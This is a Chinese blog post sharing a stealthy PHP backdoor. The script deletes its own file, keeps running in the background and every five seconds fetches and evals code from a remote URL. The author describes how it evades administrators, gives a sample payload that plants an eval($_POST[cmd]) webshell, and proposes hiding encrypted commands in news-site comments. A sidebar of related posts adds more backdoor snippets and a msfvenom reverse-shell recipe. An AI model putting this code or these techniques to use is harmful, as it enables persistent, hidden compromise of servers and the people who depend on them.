发现一个流氓后门太猥琐

最新推荐文章于 2022-05-18 15:38:34 发布
最新推荐文章于 2022-05-18 15:38:34 发布
阅读量446 收藏
点赞数
分类专栏: 安全纪实
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jackbon8/article/details/89208429
版权 
<?php

unlink($_SERVER['SCRIPT_FILENAME']);

ignore_user_abort(true);

set_time_limit(0);

$remote_file = 'http://xxx/xxx.txt';

while($code = file_get_contents($remote_file)){

@eval($code);

sleep(5);

};

?>

后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部链接

在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码
例如txt里面写了一句这样的代码 file_put_contents(’./1.php’,"<?php @eval($_POST[cmd])'"?>");
这样就会在目录下又生成一个木马
如果对方写了是执行命令 。。。
这段代码纯粹变成了一个等待命令的木马。。
而且管理员检查木马文件的时候 都找不到。。。
因为文件已经删除了
木马却注入在php-fpm内
sleep(5); 五秒就去远程读取一下指令。。。

打算将代码修改一下,加一些正则,去163某一篇新闻的评论里读取预先设定的恶意代码。。。hehe。。。
黑客连服务器都省了。。。
黑客只需要去网易新闻评论窗口内写入自己的代码就行
怕别人看懂?
直接加密
采用对称加密算法。。没有秘钥 谁也看不懂啥意思
秘钥在这段后门里面写着

所以非常安全

海纳·百川
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2854
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
PHP后门新玩法:一款猥琐的PHP后门分析
代码析构师的专栏
05-09 1464
0x00 背景 近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。 0x01 细节 Webshell代码如下: 1 2 3 4 5 6 7 8 9
PHP 奇淫巧技
qq_31238721的博客
08-15 185
pathinfo() 函数 定义和用法 pathinfo() 函数以数组的形式返回文件路径的信息。 语法 pathinfo(path,options) 参数 描述 path 必需。规定要检查的路径。 process_sections 可选。规定要返回的数组元素。默认是 all。 可能的值: PATHINFO_DIRNAME - 只返回 ...
纯手工打造HTTP请求,淫领HTTP协议!~
IntelligenceXenogeneicRobot
05-26 505
public static void main(String[] args) throws Exception{ // 我要模拟的URL //http://domain.oray.com/domain/check.php?domain=ixr.name&amp;free=0 String host = "domain.oray.com"; // 解析域名IP Str...
【文件上传漏洞】user.ini留后门
weixin_53146913的博客
05-18 4393
一、什么是.user.ini? php.ini是php默认的配置文件。其中包含四种配置, 在PHP_INI_USER的配置项中,提到.user.ini。 这里作用解释如下: 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 .user.ini 是PHP 支持基于每个目录的 I
pw的一个放后门的方法分析
10-30
### pw的一个放后门的方法分析 #### 背景与目的 本文旨在深入探讨一种针对PW(PHPWind)系统的特定后门植入方法。通过详细分析该技术的具体实施过程及其潜在安全威胁,帮助读者理解此类攻击手段的工作原理,并提供...
一个不易被发现的PHP后门代码解析
10-25
主要介绍了一个不易被发现的PHP后门代码解析,对于网络安全来说非常重要,需要的朋友可以参考下
JSP一句话后门
10-31
例如,攻击者可以写入一个恶意的WebShell,从而控制服务器的所有权限。此外,一句话后门还可以用于传播恶意软件、窃取敏感数据等恶意行为。 知识点4: 如何防御一句话后门 为了防御一句话后门,需要采取以下几点...
猥琐的PHP后门分析
橙虚缘空间
04-18 1135
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
Php后门php 后门
06-25
php 后门
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
怎么使用php后门,PHP后门的一些用法
weixin_36078790的博客
03-29 500
今天我们说一些最常见的PHP留后门的一些用法首先,写一个最简单的后门,也可以叫做木马。
.user.ini文件构成的PHP后门
m0_51428325的博客
12-26 233
.user.ini。他比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi与逆行的php都可以用这个方法。我的nginx服务器全部都是fpm/fastcgi,我的IIS php5.3以上的全部用的是fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性 那么什么是.user.ini? 这得从php.ini说起了,php.ini是php默认的配置文件,其中包括了很多php的配置,则这些配置中,又分为几种:PHP
一句话木马,.user.ini文件构成的PHP后门
jiet07的博客
08-27 873
环境:win10 工具:phpStudy,(warmsever 测试不行) 官网下载链接地址 先创建三个文件,如下图所示: 三个文件的内容: 启动Apache 测试结果
php写入配置文件getshell,MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)...
weixin_36073959的博客
03-17 530
0x01 前言看下整体的结构,用的是thinkPHP的架构,看到了install这个文件没有可以绕过install.lock进行重装,但是里面有一个一定要验证数据库,又要找一个SQL的注入漏洞。想起前几天大表哥Bypass发了一篇好像是关于mipcms的漏洞,赶紧去翻了一下,又学到不少技巧,这个技巧可以用在我上次发的一篇ZZCMS 8.2任意文件删除至Getshell的文章,里面有有个getshe...
php system eval,PHP后门的eval类和system类 函数到底有哪些区别
weixin_31960145的博客
04-12 898
一、一直以来对PHP的eval这一类函数和system这一类存在疑惑的地方,今天彻底研究了一下,写查PHP一句话的时候可以更有把握一些。其实都是一些满基础的知识,大佬别喷。干安全的基础很重要。二、PHP的eval类型函数,一句话:代码执行而不是命令执行。(菜刀用这类)1、简单类//#1-evaleval($_POST["cmd"])?>//post:cmd=phpinfo();//#2-as...
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
最新发布
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
如何使用 msfvenom创造一个php后门
04-07
以下是使用msfvenom创建php后门的步骤: 1. 打开终端并输入以下命令: ``` msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port Number> -f raw > backdoor.php ``` 2. 替换`<Your IP Address>`和`<Your Port Number>`为你的IP地址和端口号。 3. 运行命令后,将创建一个名为`backdoor.php`的文件,其中包含Meterpreter反向TCP Shell的payload。 4. 上传`backdoor.php`到目标服务器。 5. 打开Meterpreter会话,输入以下命令: ``` php backdoor.php ``` 6. 这将启动反向Shell并连接到你的机器上。现在你可以在目标服务器上执行命令以控制它。 请注意,这种方法仅适用于具有PHP解释器的目标服务器。如果目标服务器上没有PHP,则无法使用此方法创建后门
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值